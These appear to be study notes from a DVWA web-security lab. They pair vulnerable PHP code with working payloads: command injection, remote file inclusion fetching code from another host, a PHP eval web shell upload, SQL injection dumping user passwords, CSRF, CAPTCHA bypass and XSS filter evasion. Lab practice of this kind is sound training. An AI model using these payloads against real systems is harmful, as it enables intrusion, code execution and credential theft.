
	https://blog.csdn.net/qq_29277155/article/details/52726730
	
	https://blog.csdn.net/BROTHERYY/article/details/108142354

Brute Force
	burpsuite
	
	admin' or 1=1 limit 1 -- +
		if( $result && mysqli_num_rows( $result ) == 1 ) {}
		
	
	设置token
		checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
		
		pitchfork
			username=admin&password=§222§&Login=Login&user_token=§953e9335f5805d86b6926df5b2df52e7§ HTTP/1.1
			
		request engine -> number threads -> 1
		grep match -> welcome
		grep extract -> From [ value='] to [' />\r\n\x09\x09</form>]    //taken
		redirections -> always
		
		recursive grep 递归搜索
	
	if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {}
	
Command Injection

	$cmd = shell_exec( 'ping  -c 4 ' . $target ); echo "<pre>{$cmd}</pre>"; 
		127.0.0.1
		127.0.0.1 && ifconfig
		127.0.0.1 && pwd
	
	$substitutions = array(        '&&' => '',   ';'  => '',    );
		127.0 || ifconfig
	
	$substitutions = array(  '&'  => '',  ';'  => '','| ' => '','-'  => '','$'  => '','('  => '', ')'  => '', '`'  => '','||' => '',); 	
			'| ' => '',
				127.0.0.1|ls
			127.0.0.1 |||||| pwd
		
	正则表达式
	
		command1 & command2    command1与command2同时执行，不管command 1是否执行成功
		command1 && command2   先执行command1，如果为真，再执行command2
		command1 | command2    只执行command2
		command1 || command2   先执行command1，如果为假，再执行command2
	
CSRF
	((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) :...	
	http://1.117.162.201/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
		<a href="">xiuxiu</a>
		<img src="" border="0" style="display:none;"/><h1>404</h1><h2>页面没有找到</h2>
		<script>window.location=""</script>
	
	if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {}
		referer=http://1.117.162.201/dvwa/vulnerabilities/csrf/1.117.162.201
	
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 
		<iframe src="" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></iframe>
	
	$pass_curr = $_GET[ 'password_current' ]; 
	
	
File Inclusion
	$file = $_GET[ 'page' ]; 
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=/etc/passwd
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=/var/www/html/phpinfo.php
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=http://192.168.100.1/1.php	
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=E://1.php
	$file = str_replace( array( "../", "..\"" ), "", $file ); 
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=//etc//passwd
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=hthttptp://192.168.100.1/1.php
	if( !fnmatch( "file*", $file ) && $file != "include.php" ) {}
		http://1.117.162.201/dvwa/vulnerabilities/fi/?page=file:///E:1.php
		
	if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {}
	
File Upload
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { }
		<?php @eval($_POST["password"]);?>
			http://1.117.162.201/dvwa/hackable/uploads/1.php
	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&( $uploaded_size < 100000 ) ) { }
		Content-Disposition: form-data; name="uploaded"; filename="2.php" //后缀改后文件名也会改
		Content-Type: application/octet-stream  -> image/jpeg
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&( $uploaded_size < 100000 ) &&getimagesize( $uploaded_tmp ) ) { }
		1.jpg/b+1.php/a webshell.jpg  （参数“/b”表示以二进制格式复制、合并文件，参数“/a”表示以ASCII格式复制、合并文件）//未成  要先phpinfo试一试效果...
		
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 
	$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 
	
Insecure CAPTCHA
	if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { }
	if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { }
		step=1&password_new=1&password_conf=1&Change=Change
	if( !$_POST[ 'passed_captcha' ] ) { }
		step=2&password_new=123&password_conf=123&Change=Change&passed_captcha=ture
	
SQL Injection
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
		2" or 1=1 -- +
		1' union all select @@datadir,@@basedir#
		1' order by 2 #
		1' union select version(),database() #
		1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='users' #
		1' union select 1,group_concat(column_name)from information_schema.columns where table_name='users' #
		1' union select user,password from dvwa.users #
	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
		id=1&Submit=Submit  ->  id=1 or 1=1 # &Submit=Submit
		
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

SQL Injection (Blind)
	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid );
		id=1' and substr(database(),1,1)='d' #
	$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : xx;
		burpsuite->sqlmap
		
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 
	
Weak Session IDs
	$_SESSION['last_session_id']++; 
		Cookie: dvwaSession=7; security=low; PHPSESSID=58mi6ensci44filgagr6ucc3u3
	$cookie_value = time(); 
		
	$_SESSION['last_session_id_high']++;$cookie_value = md5($_SESSION['last_session_id_high']); 
	
	$cookie_value = sha1(mt_rand() . time() . "Impossible"); 
	 
XSS (DOM)
	http://1.117.162.201/dvwa/vulnerabilities/xss_d/?default=German
		http://1.117.162.201/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
	if( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { 	if (stripos ($default, "<script") !== false) { } }
		http://1.117.162.201/dvwa/vulnerabilities/xss_d/?#default=<script>alert(1)</script>
		<sc<script>ript>
		<body onload=alert('s')>
		<a href='' onclick=alert('ss')>click</a>
		<a href='' onclick=alert(/ss/)>click</a>
	switch ($_GET['default']) { default:header ("location: ?default=English"); }
		#default=<script>alert(1)</script>
	
	$name = htmlspecialchars($_GET['name']);
		
XSS (Reflected)
	if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
		<script>alert(1)</script>   //javascript:alert(1);
	$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 
		<SCRipt>alert(1)</scRipT>
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); //(.*)表示贪婪匹配，/i表示不区分大小写
		<img src=1 onerror=alert(/high/)>
		
	$name = htmlspecialchars( $_GET[ 'name' ] ); 
	
XSS (Stored)
CSP Bypass
JavaScript